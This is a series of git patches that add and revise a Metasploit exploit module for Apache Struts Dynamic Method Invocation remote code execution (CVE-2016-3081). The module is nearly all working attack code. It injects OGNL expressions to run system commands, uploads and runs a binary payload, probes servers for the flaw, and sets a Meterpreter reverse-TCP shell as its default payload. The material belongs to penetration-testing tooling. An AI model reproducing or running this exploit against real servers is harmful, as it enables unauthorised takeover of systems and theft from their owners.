From 643591546e9a7b86c23bb02dc2a1dc4ec503772e Mon Sep 17 00:00:00 2001 From: join-us Date: Fri, 29 Apr 2016 10:49:56 +0800 Subject: [PATCH 1/9] struts s2_032 rce - linux_stager --- ...uts_code_exec_dynamic_method_invocation.rb | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb new file mode 100644 index 0000000000..03074139ed --- /dev/null +++ b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb @@ -0,0 +1,183 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache Struts + version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code + Execution can be performed via method: prefix when Dynamic Method Invocation + is enabled. + }, + 'Author' => [ 'Nixawk' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-3081' ], + [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ] + ], + 'Platform' => %w{ linux }, + 'Privileged' => true, + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DisclosureDate' => 'Apr 27 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), + OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil]) + ], self.class) + end + + def send_http_request(payload) + uri = normalize_uri(datastore['TARGETURI']) + send_request_cgi( + 'uri' => uri + payload, + 'version' => '1.1', + 'method' => 'GET') + end + + def parameterize(params) # params is a hash + URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&')) + end + + def generate_rce_payload(code, params_hash) + payload = "?method:" + payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") + payload << "," + payload << Rex::Text.uri_encode(code) + payload << "," + payload << Rex::Text.uri_encode("1?#xx:#request.toString") + payload << "&" + payload << parameterize(params_hash) + payload + end + + def temp_path + return nil unless datastore['TMP_PATH'] + unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') + fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') + end + datastore['TMP_PATH'] + end + + def upload_file(filename, content) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + var_c = rand_text_alpha_lower(4) + var_d = rand_text_alpha_lower(4) + + code = "##{var_a}=new sun.misc.BASE64Decoder()," + code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0])))," + code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0]))," + code << "##{var_b}.close()" + + params_hash = { var_c => filename, var_d => content } + payload = generate_rce_payload(code, params_hash) + + send_http_request(payload) + end + + def execute_command(cmd) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + var_c = rand_text_alpha_lower(4) + var_d = rand_text_alpha_lower(4) + var_e = rand_text_alpha_lower(4) + var_f = rand_text_alpha_lower(4) + + code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream()," + code << "##{var_b}=new java.io.InputStreamReader(##{var_a})," + code << "##{var_c}=new java.io.BufferedReader(##{var_b})," + code << "##{var_d}=new char[1024]," + code << "##{var_c}.read(##{var_d})," + + code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," + code << "##{var_e}.println(##{var_d})," + code << "##{var_e}.close()" + + cmd.tr!(' ', '+') if cmd && cmd.include?(' ') + params_hash = { var_f => cmd } + payload = generate_rce_payload(code, params_hash) + + send_http_request(payload) + end + + def linux_stager + payload_exe = rand_text_alphanumeric(4 + rand(4)) + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" + + b64_filename = Rex::Text.encode_base64(payload_exe) + b64_content = Rex::Text.encode_base64(generate_payload_exe) + + print_status("Uploading exploit to #{payload_exe}") + upload_file(b64_filename, b64_content) + + print_status("Attempting to execute the payload...") + execute_command("chmod 700 #{payload_exe}") + execute_command("/bin/sh -c #{payload_exe}") + end + + def exploit + case target['Platform'] + when 'linux' + linux_stager + when 'win' + windows_stager + when 'java' + java_stager + else + fail_with(Failure::NoTarget, 'Unsupported target platform!') + end + end + + def check + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + flag = Rex::Text.rand_text_alpha(5) + + code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," + code << "##{var_a}.print(#parameters.#{var_b}[0])," + code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two}))," + code << "##{var_a}.print(#parameters.#{var_b}[0])," + code << "##{var_a}.close()" + + params_hash = { var_b => flag } + payload = generate_rce_payload(code, params_hash) + + resp = send_http_request(payload) + + if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + +end From 6f6558923b00a79e71bf12ce2053e7b7b278c774 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 10:34:48 -0500 Subject: [PATCH 2/9] Rename module as struts_dmi_exec.rb --- .../http/struts_dmi_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{multi/http/struts_code_exec_dynamic_method_invocation.rb => linux/http/struts_dmi_exec.rb} (100%) diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/linux/http/struts_dmi_exec.rb similarity index 100% rename from modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb rename to modules/exploits/linux/http/struts_dmi_exec.rb From e9535dbc5b49b947ddbb0ed809c05fbbc52e78e7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 11:03:15 -0500 Subject: [PATCH 3/9] Address all @FireFart's feedback --- .../exploits/linux/http/struts_dmi_exec.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/modules/exploits/linux/http/struts_dmi_exec.rb b/modules/exploits/linux/http/struts_dmi_exec.rb index 03074139ed..8bb0fbcd8e 100644 --- a/modules/exploits/linux/http/struts_dmi_exec.rb +++ b/modules/exploits/linux/http/struts_dmi_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code @@ -53,9 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote def send_http_request(payload) uri = normalize_uri(datastore['TARGETURI']) send_request_cgi( - 'uri' => uri + payload, - 'version' => '1.1', - 'method' => 'GET') + 'uri' => "#{uri}#{payload}", + 'method' => 'POST') end def parameterize(params) # params is a hash @@ -75,11 +74,14 @@ class MetasploitModule < Msf::Exploit::Remote end def temp_path - return nil unless datastore['TMP_PATH'] - unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') - fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') - end - datastore['TMP_PATH'] + @tmp_path ||= lambda { + path = datastore['TMP_PATH'] + return nil unless path + unless path.end_with?('/') + path << '/' + end + return path + }.call end def upload_file(filename, content) From 9e56bb8358b325e85d931e9a65fa668c8e64ae6c Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:08:00 +0800 Subject: [PATCH 4/9] send http request (get -> post) --- ...uts_code_exec_dynamic_method_invocation.rb | 36 ++++++++++--------- 1 file changed, 19 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb index 03074139ed..f483268b4c 100644 --- a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb +++ b/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb @@ -50,27 +50,23 @@ class MetasploitModule < Msf::Exploit::Remote ], self.class) end - def send_http_request(payload) + def send_http_request(payload, params) uri = normalize_uri(datastore['TARGETURI']) send_request_cgi( - 'uri' => uri + payload, - 'version' => '1.1', - 'method' => 'GET') + 'uri' => uri + payload, + 'version' => '1.1', + 'method' => 'POST', + 'vars_post' => params + ) end - def parameterize(params) # params is a hash - URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&')) - end - - def generate_rce_payload(code, params_hash) + def generate_rce_payload(code) payload = "?method:" payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") payload << "," payload << Rex::Text.uri_encode(code) payload << "," payload << Rex::Text.uri_encode("1?#xx:#request.toString") - payload << "&" - payload << parameterize(params_hash) payload end @@ -94,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote code << "##{var_b}.close()" params_hash = { var_c => filename, var_d => content } - payload = generate_rce_payload(code, params_hash) + payload = generate_rce_payload(code) - send_http_request(payload) + send_http_request(payload, params_hash) end def execute_command(cmd) @@ -119,9 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote cmd.tr!(' ', '+') if cmd && cmd.include?(' ') params_hash = { var_f => cmd } - payload = generate_rce_payload(code, params_hash) + payload = generate_rce_payload(code) - send_http_request(payload) + send_http_request(payload, params_hash) end def linux_stager @@ -140,6 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote execute_command("/bin/sh -c #{payload_exe}") end + def windows_stager + end + + def java_stager + end + def exploit case target['Platform'] when 'linux' @@ -169,9 +171,9 @@ class MetasploitModule < Msf::Exploit::Remote code << "##{var_a}.close()" params_hash = { var_b => flag } - payload = generate_rce_payload(code, params_hash) + payload = generate_rce_payload(code) - resp = send_http_request(payload) + resp = send_http_request(payload, params_hash) if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") Exploit::CheckCode::Appears From 97061c1b90fe013c415b433793bd55d8a41bce5f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 11:13:25 -0500 Subject: [PATCH 5/9] Update struts_dmi_exec.rb --- .../exploits/linux/http/struts_dmi_exec.rb | 36 ++++++++++--------- 1 file changed, 19 insertions(+), 17 deletions(-) diff --git a/modules/exploits/linux/http/struts_dmi_exec.rb b/modules/exploits/linux/http/struts_dmi_exec.rb index 8bb0fbcd8e..c5b07e3721 100644 --- a/modules/exploits/linux/http/struts_dmi_exec.rb +++ b/modules/exploits/linux/http/struts_dmi_exec.rb @@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE - include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -46,15 +45,23 @@ class MetasploitModule < Msf::Exploit::Remote [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), - OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil]) + OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil]) ], self.class) end + def print_status(msg='') + super("#{peer} - #{msg}") + end + def send_http_request(payload) uri = normalize_uri(datastore['TARGETURI']) - send_request_cgi( + res = send_request_cgi( 'uri' => "#{uri}#{payload}", 'method' => 'POST') + if res && res.code == 404 + fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') + end + res end def parameterize(params) # params is a hash @@ -74,8 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote end def temp_path - @tmp_path ||= lambda { - path = datastore['TMP_PATH'] + @TMPPATH ||= lambda { + path = datastore['TMPPATH'] return nil unless path unless path.end_with?('/') path << '/' @@ -143,16 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - case target['Platform'] - when 'linux' - linux_stager - when 'win' - windows_stager - when 'java' - java_stager - else - fail_with(Failure::NoTarget, 'Unsupported target platform!') - end + linux_stager end def check @@ -173,10 +171,14 @@ class MetasploitModule < Msf::Exploit::Remote params_hash = { var_b => flag } payload = generate_rce_payload(code, params_hash) - resp = send_http_request(payload) + begin + resp = send_http_request(payload) + rescue Msf::Exploit::Failed + return Exploit::CheckCode::Unknown + end if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") - Exploit::CheckCode::Appears + Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end From 1d95a8a76dc31e62dc3d8cc526747ecb3f700279 Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:13:34 +0800 Subject: [PATCH 6/9] rename struts_code_exec_dynamic_method_invocation.rb to struts_dmi_exec.rb --- ..._code_exec_dynamic_method_invocation.rb => struts_dmi_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/multi/http/{struts_code_exec_dynamic_method_invocation.rb => struts_dmi_exec.rb} (100%) diff --git a/modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb b/modules/exploits/multi/http/struts_dmi_exec.rb similarity index 100% rename from modules/exploits/multi/http/struts_code_exec_dynamic_method_invocation.rb rename to modules/exploits/multi/http/struts_dmi_exec.rb From 15ffae4ae8bd1d6a8e707ddaea24629a8534ea97 Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:17:26 +0800 Subject: [PATCH 7/9] rename module name --- modules/exploits/multi/http/struts_dmi_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_dmi_exec.rb b/modules/exploits/multi/http/struts_dmi_exec.rb index f483268b4c..6421334ff3 100644 --- a/modules/exploits/multi/http/struts_dmi_exec.rb +++ b/modules/exploits/multi/http/struts_dmi_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code From 288975a9ce529e107b405e30f0f4726ae45f80be Mon Sep 17 00:00:00 2001 From: join-us Date: Sat, 30 Apr 2016 00:44:31 +0800 Subject: [PATCH 8/9] rm modules/exploits/multi/http/struts_dmi_exec.rb --- .../exploits/multi/http/struts_dmi_exec.rb | 185 ------------------ 1 file changed, 185 deletions(-) delete mode 100644 modules/exploits/multi/http/struts_dmi_exec.rb diff --git a/modules/exploits/multi/http/struts_dmi_exec.rb b/modules/exploits/multi/http/struts_dmi_exec.rb deleted file mode 100644 index 6421334ff3..0000000000 --- a/modules/exploits/multi/http/struts_dmi_exec.rb +++ /dev/null @@ -1,185 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::EXE - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution', - 'Description' => %q{ - This module exploits a remote command execution vulnerability in Apache Struts - version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code - Execution can be performed via method: prefix when Dynamic Method Invocation - is enabled. - }, - 'Author' => [ 'Nixawk' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-3081' ], - [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ] - ], - 'Platform' => %w{ linux }, - 'Privileged' => true, - 'Targets' => - [ - ['Linux Universal', - { - 'Arch' => ARCH_X86, - 'Platform' => 'linux' - } - ] - ], - 'DisclosureDate' => 'Apr 27 2016', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(8080), - OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), - OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil]) - ], self.class) - end - - def send_http_request(payload, params) - uri = normalize_uri(datastore['TARGETURI']) - send_request_cgi( - 'uri' => uri + payload, - 'version' => '1.1', - 'method' => 'POST', - 'vars_post' => params - ) - end - - def generate_rce_payload(code) - payload = "?method:" - payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS") - payload << "," - payload << Rex::Text.uri_encode(code) - payload << "," - payload << Rex::Text.uri_encode("1?#xx:#request.toString") - payload - end - - def temp_path - return nil unless datastore['TMP_PATH'] - unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') - fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') - end - datastore['TMP_PATH'] - end - - def upload_file(filename, content) - var_a = rand_text_alpha_lower(4) - var_b = rand_text_alpha_lower(4) - var_c = rand_text_alpha_lower(4) - var_d = rand_text_alpha_lower(4) - - code = "##{var_a}=new sun.misc.BASE64Decoder()," - code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0])))," - code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0]))," - code << "##{var_b}.close()" - - params_hash = { var_c => filename, var_d => content } - payload = generate_rce_payload(code) - - send_http_request(payload, params_hash) - end - - def execute_command(cmd) - var_a = rand_text_alpha_lower(4) - var_b = rand_text_alpha_lower(4) - var_c = rand_text_alpha_lower(4) - var_d = rand_text_alpha_lower(4) - var_e = rand_text_alpha_lower(4) - var_f = rand_text_alpha_lower(4) - - code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream()," - code << "##{var_b}=new java.io.InputStreamReader(##{var_a})," - code << "##{var_c}=new java.io.BufferedReader(##{var_b})," - code << "##{var_d}=new char[1024]," - code << "##{var_c}.read(##{var_d})," - - code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," - code << "##{var_e}.println(##{var_d})," - code << "##{var_e}.close()" - - cmd.tr!(' ', '+') if cmd && cmd.include?(' ') - params_hash = { var_f => cmd } - payload = generate_rce_payload(code) - - send_http_request(payload, params_hash) - end - - def linux_stager - payload_exe = rand_text_alphanumeric(4 + rand(4)) - path = temp_path || '/tmp/' - payload_exe = "#{path}#{payload_exe}" - - b64_filename = Rex::Text.encode_base64(payload_exe) - b64_content = Rex::Text.encode_base64(generate_payload_exe) - - print_status("Uploading exploit to #{payload_exe}") - upload_file(b64_filename, b64_content) - - print_status("Attempting to execute the payload...") - execute_command("chmod 700 #{payload_exe}") - execute_command("/bin/sh -c #{payload_exe}") - end - - def windows_stager - end - - def java_stager - end - - def exploit - case target['Platform'] - when 'linux' - linux_stager - when 'win' - windows_stager - when 'java' - java_stager - else - fail_with(Failure::NoTarget, 'Unsupported target platform!') - end - end - - def check - var_a = rand_text_alpha_lower(4) - var_b = rand_text_alpha_lower(4) - - addend_one = rand_text_numeric(rand(3) + 1).to_i - addend_two = rand_text_numeric(rand(3) + 1).to_i - sum = addend_one + addend_two - flag = Rex::Text.rand_text_alpha(5) - - code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter()," - code << "##{var_a}.print(#parameters.#{var_b}[0])," - code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two}))," - code << "##{var_a}.print(#parameters.#{var_b}[0])," - code << "##{var_a}.close()" - - params_hash = { var_b => flag } - payload = generate_rce_payload(code) - - resp = send_http_request(payload, params_hash) - - if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}") - Exploit::CheckCode::Appears - else - Exploit::CheckCode::Safe - end - end - -end From d6a6577c5cd0646aac35895e8f8acf9004148c27 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 29 Apr 2016 11:52:50 -0500 Subject: [PATCH 9/9] Default payload to linux/x86/meterpreter/reverse_tcp_uuid Default to linux/x86/meterpreter/reverse_tcp_uuid for now because of issue #6833 --- modules/exploits/linux/http/struts_dmi_exec.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/linux/http/struts_dmi_exec.rb b/modules/exploits/linux/http/struts_dmi_exec.rb index c5b07e3721..8c38fff8ef 100644 --- a/modules/exploits/linux/http/struts_dmi_exec.rb +++ b/modules/exploits/linux/http/struts_dmi_exec.rb @@ -29,6 +29,9 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Platform' => %w{ linux }, 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid' + }, 'Targets' => [ ['Linux Universal',